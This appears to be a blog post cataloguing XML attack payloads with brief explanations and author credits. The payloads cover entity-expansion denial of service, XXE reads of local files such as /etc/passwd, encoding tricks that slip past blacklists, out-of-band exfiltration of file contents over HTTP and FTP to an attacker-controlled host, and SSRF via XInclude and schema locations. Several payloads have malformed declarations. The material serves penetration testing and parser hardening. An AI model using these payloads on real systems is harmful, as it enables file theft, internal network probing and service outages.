



```
<!ENTITY % a0 "dos" >
<!ENTITY % a1 "%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;">
<!ENTITY % a2 "%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;">
<!ENTITY % a3 "%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;">
<!ENTITY % a4 "%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;">
<!ENTITY g "%a4;" >
```

### Quadratic Blowup Attack

```
<!DOCTYPE data [
<!ENTITY a0 "dosdosdosdosdosdos...dos"
]>
<data>&a0;&a0;...&a0;</data>
```

Source

### Recursive General Entities

This vector is not well-formed by [WFC: No Recursion].

```
<!DOCTYPE data [
<!ENTITY a "a&b;" >
<!ENTITY b "&a;" >
]>
<data>&a;</data>
```

### External General Entities (Steuck, 2002)

The idea of this attack is to declare an external general entity and reference a large file on a network resource or locally (e.g. `C:/pagefile.sys` or `/dev/random`).

However, conducting DoS attacks in such a manner is only applicable by making the parser process a **large XML document**.

```
<?xml version='1.0'?>
<!DOCTYPE data [
<!ENTITY dos SYSTEM "file:///publicServer.com/largeFile.xml" >
]>
<data>&dos;</data>
```

Source

## Classic XXE

### Classic XXE Attack (Steuck, 2002)

```
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>
```

We use the file `/sys/power/image_size` as an example, because it is a very simple file (one line, no special characters).

This attack requires a direct feedback channel and reading out files is limited by "forbidden characters in XML" such as "<" and "&".

If such characters occur in the accessed file (e.g. `/etc/fstab`) the XML parser raises an exception and stops the parsing of the message.

Source

### XXE Attack using netdoc

```
<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data (#PCDATA)>
<!ENTITY file SYSTEM "netdoc:/sys/power/image_size">
]>
<data>&file;</data>
```

Source: @Nirgoldshlager

### XXE Attack using UTF-16 (Dawid Golunski)

Some simple blacklisting countermeasures can probably be bypassed by changing the default XML charset (which is UTF-8), to a different one, for example, UTF-16

```
<?xml version="1.0" encoding="UTF-16"?>
<!DOCTYPE data [
<!ELEMENT data (#PCDATA)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>
```

The above file can be simply created with a texteditor.  
To convert it to UTF-16, you can use the linux tool iconv

```
# cat file.xml | iconv -f UTF-8 -t UTF-16 > file_utf16.xml
```

Source, Thanks to @ilmila

### XXE Attack using UTF-7

The same trick can be applied to UTF-7 as-well.

```
<?xml version="1.0" encoding="UTF-7" ?>
<!DOCTYPE data [
<!ELEMENT data (#PCDATA)>
<!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>
```

```
# cat file.xml | iconv -f UTF-8 -t UTF-7 > file_utf7.xml
```

Source, Thanks to @ilmila

## Evolved XXE Attacks - Direct Feedback Channel

This class of attacks vectors is called evolved XXE attacks and is used to (i) bypass restrictions of classic XXE attacks and (ii) for Out-of-Band attacks.

### Bypassing Restrictions of XXE (Morgan, 2014)

```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ELEMENT data (#ANY)>
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///sys/power/image_size">
<!ENTITY % end "]">
<!ENTITY % dtd SYSTEM "http://publicServer.com/parameterEntity_core.dtd">
% dtd;
]>
<data>&all;</data>
```

File stored on [http://publicServer.com/parameterEntity\\_core.dtd](http://publicServer.com/parameterEntity_core.dtd)

```
<!ENTITY all "%start;%goodies;%end;">
```

Source

### Bypassing Restrictions of XXE (Späth, 2015)

```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_doctype.dtd">
<data>&all;</data>
```

File stored on [http://publicServer.com/parameterEntity\\_doctype.dtd](http://publicServer.com/parameterEntity_doctype.dtd)

```
<!ELEMENT data (#PCDATA)>
<!ENTITY % start "<![CDATA[">
<!ENTITY % goodies SYSTEM "file:///sys/power/image_size">
<!ENTITY % end "]">
<!ENTITY all "%start;%goodies;%end;">
```

### XXE by abusing Attribute Values (Yunusov, 2013)

This vector bypasses [WFC: No External Entity References].

```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote;
```

```
<data attrib='&internal;'/>
```

File stored on [http://publicServer.com/external\\_entity\\_attribute.dtd](http://publicServer.com/external_entity_attribute.dtd)

```
<!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY internal '%payload;'">
%param1;
```

Source

### Error-based XXE using Parameter Entities (Arseniy Sharoglazov, 2018)

```
<?xml version="1.0" ?>
<!DOCTYPE message [
  <!ENTITY % ext SYSTEM "http://attacker.com/ext.dtd">
  %ext;
]>
<message></message>
```

File stored on <http://attacker.com/ext.dtd>

```
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'">
%eval;
%error;
```

Source

### Abusing local-DTD Files XXE (Arseniy Sharoglazov, 2018)

Because external DTD subsets are prohibited within an internal subset, one can use a locally existing DTD file as follows:

```
<?xml version="1.0" ?>
<!DOCTYPE message [
  <!ENTITY % local_dtd SYSTEM "file:///opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd">

  <!ENTITY % condition 'aaa">
    <!ENTITY &#x25; file SYSTEM "file:///etc/passwd">
    <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27; ">
    &#x25;eval;
    &#x25;error;
  <!ELEMENT aa (bb'>

  %local_dtd;
]>
<message>any text</message>
```

Contents of [sig-app\\_1\\_0.dtd](#)

```
...
<!ENTITY % condition "and | or | not | equal | contains | exists |
subdomain-of">
<!ELEMENT pattern (%condition;)>
...
```

Source (also providing a list of local DTD files)

## Evolved XXE Attacks - Out-of-Band channels

Just because there is no direct feedback channel available does not imply that an XXE attack is not possible.

### XXE OOB Attack (Yunusov, 2013)

```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd">
<data>&send;</data>
```

File stored on [http://publicServer.com/parameterEntity\\_oob.dtd](http://publicServer.com/parameterEntity_oob.dtd)

```
<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;
```

Source

### XXE OOB Attack - Parameter Entities (Yunusov, 2013)

Here is a variation of the previous attack using only parameter entities.

```
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendhttp.dtd">
%remote;
%send;
]>
<data>4</data>
```

File stored on [http://publicServer.com/parameterEntity\\_sendhttp.dtd](http://publicServer.com/parameterEntity_sendhttp.dtd)

```
<!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'http://publicServer.com/%payload;'>">
%param1;
```

Source

### XXE OOB Attack - Parameter Entities FTP (Novikov, 2014)

Using the FTP protocol, an attacker can read out files of arbitrary length.

```
<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd">
%remote;
%send;
]>
<data>4</data>
```

File stored on [http://publicServer.com/parameterEntity\\_sendftp.dtd](http://publicServer.com/parameterEntity_sendftp.dtd)

```
<!ENTITY % payload SYSTEM "file:///sys/power/image_size">
<!ENTITY % param1 "<!ENTITY &#37; send SYSTEM 'ftp://publicServer.com/%payload;'>">
%param1;
```

This attack requires to setup a modified FTP server. However, adjustments to this PoC code are probably necessary to apply it to an arbitrary parser.

Source

### SchemaEntity Attack (Späth, 2015)

We identified three variations of this attack using (i) schemaLocation, (ii) noNamespaceSchemaLocation and (iii) XInclude.

#### schemaLocation

```
<?xml version='1.0'?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote;
]>
<tt:data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="ttt http://publicServer.com/&internal;">4</ttt:data>
```

#### noNamespaceSchemaLocation

```
<?xml version='1.0'?>
<!DOCTYPE data [
<!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote;
]>
<data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://publicServer.com/&internal;"></data>
```

**XInclude**

```
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
<ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd">
%remote;
]>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://192.168.2.31/&internal;"
parse="text"></xi:include></data>
```

File stored on [http://publicServer.com/external\\_entity\\_attribute.dtd](http://publicServer.com/external_entity_attribute.dtd)

```
<ENTITY % payload SYSTEM "file:///sys/power/image_size">
<ENTITY % param1 "<ENTITY internal '%payload;'">
%param1;
```

**SSRF Attacks****DOCTYPE**

```
<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<ELEMENT data (#ANY)>
]>
<data>4</data>
```

**External General Entity (Steuck, 2002)**

```
<?xml version='1.0'?>
<!DOCTYPE data [
<ELEMENT data (#ANY)>
<ENTITY remote SYSTEM "http://internalSystem.com/file.xml">
]>
<data>&remote;</data>
```

Although it is best to reference a well-formed XML file (or any text file for that matter), in order not to cause an error, it is possible with some parsers to invoke an URL without referencing a not well-formed file.

Source

**External Parameter Entity (Yunusov, 2013)**

```
<?xml version='1.0'?>
<!DOCTYPE data [
<ELEMENT data (#ANY)>
<ENTITY % remote SYSTEM "http://publicServer.com/url_invocation_parameterEntity.dtd">
%remote;
]>
<data>4</data>
```

File stored on [http://publicServer.com/url\\_invocation\\_parameterEntity.dtd](http://publicServer.com/url_invocation_parameterEntity.dtd)

```
<ELEMENT data2 (#ANY)>
```

Source

**XInclude**

```
<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml">
</xi:include></data>
```

File stored on <http://publicServer.com/file.xml>

```
<?xml version='1.0' encoding='utf-8'?><data>it_works</data>
```

**schemaLocation**

```
<?xml version='1.0'?>
<tt:data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:ttt="http://test.com/attack"
xsi:schemaLocation="http://publicServer.com/url_invocation_schemaLocation.xsd">4</ttt:data>
```

File stored on [http://publicServer.com/url\\_invocation\\_schemaLocation.xsd](http://publicServer.com/url_invocation_schemaLocation.xsd)

```
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema
  xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="data" type="xs:string"/>
</xs:schema>
```

or use this file

```
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema
  xmlns:xs="http://www.w3.org/2001/XMLSchema"
  targetNamespace="http://test.com/attack">
  <xs:element name="data" type="xs:string"/>
</xs:schema>
```

### noNamespaceSchemaLocation

```
<?xml version='1.0'?>
<data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  xsi:noNamespaceSchemaLocation="http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd">4</data>
```

File stored on [http://publicServer.com/url\\_invocation\\_noNamespaceSchemaLocation.xsd](http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd)

```
<?xml version="1.0" encoding="UTF-8"?>
<xs:schema
  xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <xs:element name="data" type="xs:string"/>
</xs:schema>
```

## XXE on JSON Webservices Trick (Antti Rantasaari)

If you pentest a web service that supports JSON, you can try to enforce it parsing XML as well. The example is copied from this Blogpost by Antti Rantasaari.

Given HTTP example request:

```
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":{"name","value":"netspittest"}}
```

It can be converted to enforce using XML by setting the HTTP Content-Type to application/xml:

```
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
  <search>name</search>
  <value>&xxe;</value>
</root>
```

In this case, the JSON parameters "name" and "value" are converted to XML elements "<search>" and "<value>" to be Schema conform to the JSON format.

A root element "<root>" was added around <search> and <value> to get a valid XML document (since an XML document must have exactly one root element).

The XXE attack might also work by simply adding one of the other attack vectors of this blog.

Source

## XInclude Attacks (Morgan, 2014)

```
<data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="/sys/power/image_size"></xi:include>
</data>
```

Source

## XSLT Attacks

```
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:value-of select="document('/sys/power/image_size')">
  </xsl:value-of></xsl:template>
</xsl:stylesheet>
```

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Labels: XML, XXE

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When evaluating the security of XML based services, one should always consider DTD based attack vectors, such as XML External Entities (XXE)...



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